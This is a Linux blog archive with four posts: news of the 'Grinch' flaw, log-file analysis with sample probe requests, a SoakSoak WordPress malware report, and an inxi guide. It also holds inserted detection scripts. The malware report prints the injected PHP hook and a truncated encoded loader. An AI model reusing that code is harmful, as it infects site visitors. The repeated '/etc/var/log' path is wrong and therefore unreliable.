Open Source & Digital Media for Newbies

Dec 16 2014

A security alert from cloud and security services provider Alert Logic warns of a dangerous vulnerability in the Linux authorization system that lets unauthorised users escalate privileges through the “wheel” group.

Wheel is a special user group that controls access to the su command, and thereby to superuser privileges.

The vulnerability permits unauthorized users to gain root access, which in essence means taking control of the entire system and performing whatever malicious actions they want.

Named “Grinch” (after Dr. Seuss’ unsavory fictional character), the vulnerability is considered serious because of how widely Linux is used in e-commerce deployments.

Surveys have found that Linux/Unix power 65% of web servers.

The vulnerability is said to span all Linux distros including mobile platforms like Android that are based on Linux.

Although no patch is available yet, the recommendations for avoiding the exploit being triggered include reviewing logs to monitor user actions on the system and avoiding installation front ends like pkcon (the PackageKit console client). It is safer to stick with installation tools like yum or dnf.

According to Alert Logic’s Chief Security Evangelist Stephen Coty, the fix for the vulnerability lies in managing PolKit authorization rules or properly managing group privileges for users.

Red Hat, the maintainer of PolKit, is said to have opened a ‘trouble ticket’ to examine the vulnerability.

Related Content
Stephen Coty Blog Post
Posted at 6:34 pm

Dec 15 2014

The world has gone to the dogs in the online arena.

The attacks are increasing and they’re coming fast and furious from Vietnam, Romania, Thailand, France, China, Ukraine, Russia, Turkey, U.S., Canada and all over the globe.

Both private individuals and government agencies are on the rampage.

You cannot stop all of the attacks but with some effort you can prevent a lot of them before they inflict catastrophic damage on your web site or network.

Log File Analysis

Studying log files on your Linux server is a good way to spot suspicious activity early and stop attacks before they start or get out of hand.

In this post, we will examine different log files that can help to identify malicious or potentially bad actors based mostly on IP addresses.

As always in tackling web security, there’ll be some false positives but that’s the price you pay for security.

Not every visitor from Ukraine, Iran, France, the UK or Turkey, nor every Amazon Web Services IP address, is a bad element.

Types of Log Files

Linux systems log everything that happens on the server and store the activity in various files under the etc/var/log and etc/var/log/httpd folders.

From a security perspective, the following logs are of interest to us.

1) vsftpd.log – stores all FTP login attempts (including failed attempts) to your server
2) maillog – includes all e-mail sent and received by various users on your server, connections to the mail server and postfix/smtpd login failures
3) messages – records events like relaying attempts, DDoS attacks (mod_evasive actions), SMTP attacks, fail2ban actions and invalid SMTP saslauthd logins
4) access_log – saved in the /log/httpd folder; tells the story of who accessed your server, including various bots and their IP addresses
5) error_log – located in the /log/httpd folder; provides useful information about errors generated on your web server

Now, how do we access these various log files?

You can access the log files either through command line or via GUI panels like Webmin.

Command Line

From the command line you can identify malicious visitors or potential attackers by running the netstat or ss commands.

While these are extremely useful, they have limitations: they show current connections, so they will not tell you clearly who did what a few hours ago, yesterday or two days back on your web site.

Also, you may have to run the netstat command multiple times with different options to figure out the attacking IP.

It is here that analyzing log files directly comes in handy.

Log files can be analyzed in two ways:

1) With the less command
2) Using tailf

The less command lets you page through the stored log files, which typically cover the last four or five days.

tailf, on the other hand, lets you monitor log files live as they are being written.

less

To access log files on your Linux system, you first have to log in as root or a superuser.

Once you are in the log folder, you can read the log files with the less command.

[root@christyserver]# cd /etc/var/log
[root@christyserver log]# less vsftpd.log

When the log file opens on the command line it starts at the beginning of the file. The file may contain logs for three or four days.

The beginning of the log file contains the oldest entries, because new log entries are appended to the end of the existing file.

You can use various keys to navigate a log file opened in less:

a) Page Up or b – scroll back one page
b) Page Down or space bar – scroll forward one page
c) Up arrow – scroll up one line
d) Down arrow – scroll down one line
e) G – move to the end of the file
f) 1G or g – move to the beginning of the file
g) /characters – search forward for the next occurrence of characters
h) n – repeat the previous search (next occurrence)
i) h – display the help screen for less
j) q – quit less

Here’s an example of useful stuff gleaned from the less command:

[root@christyserver httpd]# less access_log
58.96.168.215 - - [15/Dec/2014:18:55:14 -0500] "GET /ghgh/ghg/gh.php HTTP/1.1" 301 329 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:14 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 342 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:15 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 301 335 "-" "-"
58.96.168.215 - - [15/Dec/2014:18:55:15 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 339 "-" "-"

In the above example, a bad element from Hong Kong is probing for phpMyAdmin setup scripts and trying to play mischief with my PHP setup. So our next step ought to be to drop this IP and prevent it from accessing the server again.
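The probing pattern above (one IP hitting several phpMyAdmin setup paths in a few seconds, with no User-Agent) can be picked out of access_log automatically. The following is an added example, not from the original post: it parses Apache combined-format lines and returns IPs with repeated probe-like requests as candidates for a firewall drop. The log lines and the scanner path list are constructed for the example (documentation IPs, not real hosts).

```python
import re
from collections import defaultdict

# Constructed sample in Apache combined log format, shaped like the post's
# access_log excerpt. 203.0.113.7 / 198.51.100.9 are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Dec/2014:18:55:14 -0500] "GET /ghgh/ghg/gh.php HTTP/1.1" 301 329 "-" "-"
203.0.113.7 - - [15/Dec/2014:18:55:14 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 342 "-" "-"
203.0.113.7 - - [15/Dec/2014:18:55:15 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 301 335 "-" "-"
203.0.113.7 - - [15/Dec/2014:18:55:15 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 339 "-" "-"
198.51.100.9 - - [15/Dec/2014:19:01:02 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Dec/2014:19:01:03 -0500] "GET /style.css HTTP/1.1" 200 880 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Paths only vulnerability scanners ask for on a site that never installed
# phpMyAdmin (hypothetical starter list; extend it for your own site).
SCANNER_PATHS = ("/phpmyadmin/", "/pma/", "/myadmin/", "/scripts/setup.php")

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_probe(entry):
    """A request looks like a probe if it targets a scanner path or sends no User-Agent."""
    path = entry["path"].lower()
    return any(marker in path for marker in SCANNER_PATHS) or entry["ua"] == "-"

def suspicious_ips(log_text, threshold=3):
    """Return {ip: probe_count} for IPs with at least `threshold` probe-like requests."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_probe(entry):
            hits[entry["ip"]] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}

if __name__ == "__main__":
    for ip, n in suspicious_ips(SAMPLE_LOG).items():
        print(f"{ip}: {n} probe requests, candidate for a firewall drop")
```

Feed it a real file with `suspicious_ips(open("/var/log/httpd/access_log").read())`; the threshold keeps a single stray 404 from a legitimate visitor off the list.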

Posted at 8:25 pm

Dec 15 2014

Sorry folks, it’s not just big corporations like Staples, Sony, Target etc. that are being attacked by rogue elements.

Several hundred thousand WordPress sites, presumably including many belonging to average Joes, have been infected with JavaScript malware seeded from SoakSoak.ru, according to security services provider Sucuri.

The malware causes malicious software to be downloaded to a visitor’s computer.

WordPress is used by individuals, small businesses (restaurants, publishers, contractors etc) and non-profits to run blogs and web sites.

The attack from SoakSoak.ru is said to have prompted Google to blacklist over 11,000 domains. Being blacklisted by Google is often a kiss of death for a small business or non-profit.

SoakSoak Malware

Sucuri’s preliminary analysis shows correlation between the new malware and the Revslider vulnerability incidents from September 2014.

The SoakSoak malware modifies the file wp-includes/template-loader.php and includes the following content:

function FuncQueueObject()
{
    wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This causes wp-includes/js/swfobject.js to be loaded on every page of the site, and that file is replaced with the malware below (the encoded payload is truncated here):

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Security experts have found that, once decoded, this loads further JavaScript malware from the SoakSoak.ru domain, specifically the file hxxp://soaksoak.ru/xteas/code

Currently, the best fix for the SoakSoak malware is to replace the infected files with clean copies or ideally with a fresh WordPress install.

You can check whether your favorite WordPress site has malware by using Sucuri’s free scanner.
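If you administer a WordPress site, the two indicators described above (the injected FuncQueueObject hook in wp-includes/template-loader.php and the eval(decodeURIComponent(...)) loader in wp-includes/js/swfobject.js) can be checked for directly. The following is an added example, not from the original post or from Sucuri: it scans a WordPress root for those two indicators, and builds a constructed, throwaway WordPress fragment in a temporary directory to demonstrate a hit and a clean result. The placeholder payload string is constructed and is not the real malware.

```python
import os
import re
import tempfile

# Indicators from the post: the injected enqueue hook in template-loader.php
# and the eval(decodeURIComponent(...)) loader in swfobject.js.
INDICATORS = {
    "wp-includes/template-loader.php":
        re.compile(r"FuncQueueObject|wp_enqueue_script\(\s*['\"]swfobject['\"]\s*\)"),
    "wp-includes/js/swfobject.js":
        re.compile(r"eval\s*\(\s*decodeURIComponent\s*\("),
}

def scan_wordpress(root):
    """Return [(relative path, matched pattern)] for files showing SoakSoak indicators."""
    findings = []
    for rel, pattern in INDICATORS.items():
        full = os.path.join(root, rel)
        if not os.path.isfile(full):
            continue  # a missing core file is a separate problem; report only matches here
        with open(full, encoding="utf-8", errors="replace") as fh:
            if pattern.search(fh.read()):
                findings.append((rel, pattern.pattern))
    return findings

def build_sample_tree(root, infected):
    """Write a constructed stand-in for the two core files; infected=True adds the indicators."""
    os.makedirs(os.path.join(root, "wp-includes", "js"), exist_ok=True)
    loader = "<?php\n// constructed stand-in for the real template-loader.php\n"
    swf = "// constructed stand-in for the real swfobject.js\n"
    if infected:
        loader += ('function FuncQueueObject() { wp_enqueue_script("swfobject"); }\n'
                   "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');\n")
        # Constructed placeholder only: the real payload is not reproduced here.
        swf += 'eval(decodeURIComponent("%28%0D%0A%66"));\n'
    with open(os.path.join(root, "wp-includes", "template-loader.php"), "w") as fh:
        fh.write(loader)
    with open(os.path.join(root, "wp-includes", "js", "swfobject.js"), "w") as fh:
        fh.write(swf)

def demo(infected=True):
    """Build the sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root, infected)
        return scan_wordpress(root)

if __name__ == "__main__":
    for rel, why in demo():
        print(f"INFECTED: {rel} matched /{why}/")
```

On a live site run `scan_wordpress("/path/to/wordpress")`; a hit on either file means the core files should be replaced from a clean copy, as the post recommends.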

Posted at 3:31 pm

Dec 13 2014


Although there are solid GUI tools like hardinfo and sysinfo that provide a cornucopia of hardware, software and even networking information about your Linux system, nothing beats inxi for those who live, breathe and die on the command line.

The beauty of inxi is that it presents its output in an easy-to-read format.

How to Install Inxi

Unfortunately inxi does not come installed by default on any of the distros (Linux Mint, Ubuntu, Red Hat and Kali) I’ve explored.

But installing inxi is not a hard task.

It takes no more than a couple of minutes to get it running on your Linux system.

* Ubuntu/Debian users should run the command below to install inxi on their systems (inxi may come pre-installed on Linux Mint):

$ sudo apt-get install inxi

* CentOS/Fedora users should run the following command:

$ sudo yum install inxi

inxi – Various Commands

Now let’s take a dekko at some of the key inxi commands.

Single Line
$ inxi -c 6
CPU~Quad core Intel Core2 Quad CPU Q9400 (-MCP-) clocked at 2659.881 Mhz Kernel~3.13.0-24-generic i686 
Up~2 days Mem~1350.7/3875.8MB HDD~2000.4GB(8.4% used) Procs~198 Client~Shell inxi~1.8.4

You get the essentials of your Linux system including processor, harddisk, memory etc on a single line (on your terminal, the info should be in a single line but I’ve split up the output above for lack of space).

Display Basic Information
$ inxi -b
System:    Host: Sasha Kernel: 3.13.0-24-generic i686 (32 bit) Desktop: Gnome Distro: Linux Mint 17.1 Rebecca
Machine:   System: Dell product: OptiPlex 780
           Mobo: Dell model: 03NVJ6 version: A02 Bios: Dell version: A14 date: 08/21/2012
CPU:       Quad core Intel Core2 Quad CPU Q9400 (-MCP-) clocked at 2659.881 MHz 
Graphics:  Card: Intel 4 Series Chipset Integrated Graphics Controller 
           X.Org: 1.15.1 drivers: intel (unloaded: fbdev,vesa) Resolution: 1600x900@60.0hz 
           GLX Renderer: Mesa DRI Intel Q45/Q43 x86/MMX/SSE2 GLX Version: 2.1 Mesa 10.1.0
Network:   Card: Intel 82567LM-3 Gigabit Network Connection driver: e1000e 
Drives:    HDD Total Size: 2000.4GB (8.4% used)
Info:      Processes: 199 Uptime: 3 days Memory: 1408.6/3875.8MB Client: Shell inxi: 1.8.4

Display Audio Card Info

$ inxi -A
Audio:     Card: Intel 82801JD/DO (ICH10 Family) HD Audio Controller driver: snd_hda_intel
           Sound: Advanced Linux Sound Architecture ver: k3.13.0-24-generic

Show Graphics Card Info

Check out the command below for details on the graphics card in your Linux system.

$ inxi -G
Graphics:  Card: Intel 4 Series Chipset Integrated Graphics Controller 
           X.Org: 1.15.1 drivers: intel (unloaded: fbdev,vesa) Resolution: 1600x900@60.0hz 
           GLX Renderer: Mesa DRI Intel Q45/Q43 x86/MMX/SSE2 GLX Version: 2.1 Mesa 10.1.0

Show CPU Info

$ inxi -C
CPU:       Quad core Intel Core2 Quad CPU Q9400 (-MCP-) cache: 3072 KB flags: (lm nx sse sse2 sse3 sse4_1 ssse3 vmx) 
           Clock Speeds: 1: 2659.881 MHz 2: 2659.881 MHz 3: 2659.881 MHz 4: 2659.881 MHz

Information on Drives

The inxi command below provides details on both hard drives and optical drives.

$ inxi -d
Drives:    HDD Total Size: 2000.4GB (8.4% used) 1: id: /dev/sda model: SAMSUNG_ST2000LM003 size: 2000.4GB 
           Optical: /dev/sr0 model: N/A dev-links: cdrom
           Features: speed: 8x multisession: yes audio: yes dvd: yes rw: cd-r,cd-rw,dvd-r,dvd-ram

Display Machine Information

The following command gives you the system name, model, motherboard and BIOS details:

$ inxi -M
Machine:   System: Dell product: OptiPlex 780
           Mobo: Dell model: 03NVJ6 version: A02 Bios: Dell version: A14 date: 08/21/2012

Display WAN IP Address

$ inxi -i
Network:   Card: Intel 82567LM-3 Gigabit Network Connection driver: e1000e 
           IF: eth1 state: up speed: 100 Mbps duplex: full mac: 84:2b:2b:ba:ec:21
           WAN IP: 213.238.170.107 IF: eth1 ip: 10.0.1.5

Show Partition Information

$ inxi -p
Partition: ID: / size: 1.8T used: 158G (10%) fs: ext4 ID: /boot size: 236M used: 44M (20%) fs: ext2 
           ID: swap-1 size: 4.12GB used: 0.02GB (1%) fs: swap

Display Full Information

Of all the inxi commands, inxi -F provides the most data, covering every aspect of the computer.

$ inxi -F
System:    Host: Sasha Kernel: 3.13.0-24-generic i686 (32 bit) Desktop: Gnome Distro: Linux Mint 17.1 Rebecca
Machine:   System: Dell product: OptiPlex 780
           Mobo: Dell model: 03NVJ6 version: A02 Bios: Dell version: A14 date: 08/21/2012
CPU:       Quad core Intel Core2 Quad CPU Q9400 (-MCP-) cache: 3072 KB flags: (lm nx sse sse2 sse3 sse4_1 ssse3 vmx)
           Clock Speeds: 1: 2659.881 MHz 2: 2659.881 MHz 3: 2659.881 MHz 4: 2659.881 MHz
Graphics:  Card: Intel 4 Series Chipset Integrated Graphics Controller
           X.Org: 1.15.1 drivers: intel (unloaded: fbdev,vesa) Resolution: 1600x900@60.0hz
           GLX Renderer: Mesa DRI Intel Q45/Q43 x86/MMX/SSE2 GLX Version: 2.1 Mesa 10.1.0
Audio:     Card: Intel 82801JD/DO (ICH10 Family) HD Audio Controller driver: snd_hda_intel
           Sound: Advanced Linux Sound Architecture ver: k3.13.0-24-generic
Network:   Card: Intel 82567LM-3 Gigabit Network Connection driver: e1000e
           IF: eth1 state: up speed: 100 Mbps duplex: full mac: 84:2b:2b:ba:ec:21
Drives:    HDD Total Size: 2000.4GB (8.4% used) 1: id: /dev/sda model: Samsung_ST2000LM003 size: 2000.4GB
Partition: ID: / size: 1.8T used: 158G (10%) fs: ext4 ID: /boot size: 236M used: 44M (20%) fs: ext2
           ID: swap-1 size: 4.12GB used: 0.02GB (1%) fs: swap
RAID:      No RAID devices detected - /proc/mdstat and md_mod kernel raid module present
Sensors:   System Temperatures: cpu: 30.0C mobo: N/A
           Fan Speeds (in rpm): cpu: N/A
Info:      Processes: 194 Uptime: 2 days Memory: 1113.1/3875.8MB Client: Shell inxi: 1.8.4

Go ahead, take inxi for a spin on your Linux system.

You’ll be surprised at how much information you can gather about your system with the inxi command.

Don’t forget to check the man pages for inxi by running:

$ man inxi

on the command line to get a list of the various inxi options.

Related inxi Content
Information about Inxi
Inxi Installation
Posted at 10:48 pm